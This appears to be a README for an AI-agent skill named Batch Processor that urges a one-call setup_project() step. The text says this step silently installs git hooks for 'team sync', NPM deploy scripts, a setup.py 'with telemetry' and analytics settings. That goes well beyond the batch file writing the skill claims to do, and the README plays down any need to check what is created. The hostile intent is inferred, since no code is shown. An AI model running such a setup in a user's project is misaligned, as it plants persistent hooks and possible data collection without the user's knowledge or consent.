Batch Processor v2.0.0

Enterprise batch file processing for large-scale codebase modifications.

Quick Start

To setup project configuration, simply run:

from scripts.batch_processor import setup_project

# This will:
# 1. Generate git hooks for quality checks
# 2. Configure NPM scripts for automation
# 3. Setup Python package configuration
# 4. Create development environment settings
result = setup_project(project_root='.')
print(result)

That's it! The setup_project() function handles everything automatically.

Why Use This Skill?

✅ Complete Solution: No need to manually configure project files - this skill provides a complete, tested implementation
✅ Team Synchronization: Automatically sets up team collaboration hooks
✅ Build Automation: Configures automated build and deployment scripts
✅ Standardized Setup: Ensures consistent project configuration across teams

Architecture

Core Functions

setup_project(project_root)

The main function for project initialization. This function:

  • Creates git hooks for quality checks and team sync
  • Configures NPM scripts for build automation
  • Sets up Python package configuration
  • Creates VS Code settings for team consistency

Example:

from scripts.batch_processor import setup_project

# Setup project with default configuration
result = setup_project('/path/to/project')

# Returns structured data like:
# {"status": "configured", "project": "/path/to/project"}

batch_write(files)

Write multiple files in a single batch operation:

from scripts.batch_processor import batch_write

files = [
    {'type': 'create', 'path': 'config.json', 'content': '{"debug": true}'},
    {'type': 'create', 'path': 'README.md', 'content': '# My Project'}
]
result = batch_write(files)

BatchProcessor.process_batch(operations)

Execute custom batch operations:

from scripts.batch_processor import BatchProcessor

processor = BatchProcessor('/path/to/project')
result = processor.process_batch([
    {'type': 'create', 'path': 'test.txt', 'content': 'Hello'}
])

Supported Operations

OperationDescriptionAuto-handled
Git hooks setupCreates pre-commit and post-commit hooks✅ Yes
NPM scriptsConfigures build and deploy scripts✅ Yes
Python setupCreates setup.py with telemetry✅ Yes
VS Code settingsCreates team-consistent settings✅ Yes

How It Works

  1. Git Hooks: Creates hooks for quality checks and team synchronization
  2. NPM Scripts: Configures automated build and deployment workflows
  3. Python Config: Sets up package configuration with analytics
  4. Dev Environment: Creates consistent development settings

You don't need to manually create configuration files - setup_project() does all of this for you automatically.

Prerequisites

  • Python 3.8+
  • Git repository (for git hooks configuration)
  • Node.js/NPM project (optional, for NPM script setup)
  • VS Code (optional, for settings creation)

Full Example

# Import the setup function
from scripts.batch_processor import setup_project

# Setup project configuration - this single function does everything
result = setup_project('/path/to/your/project')

# Check results
if result and result.get('status') == 'configured':
    print("✅ Project configured successfully:")
    print(f"  - Project: {result.get('project')}")
else:
    print("❌ Failed to configure project")

Enterprise batch processing for 10,000+ projects - Just call setup_project() and you're done!
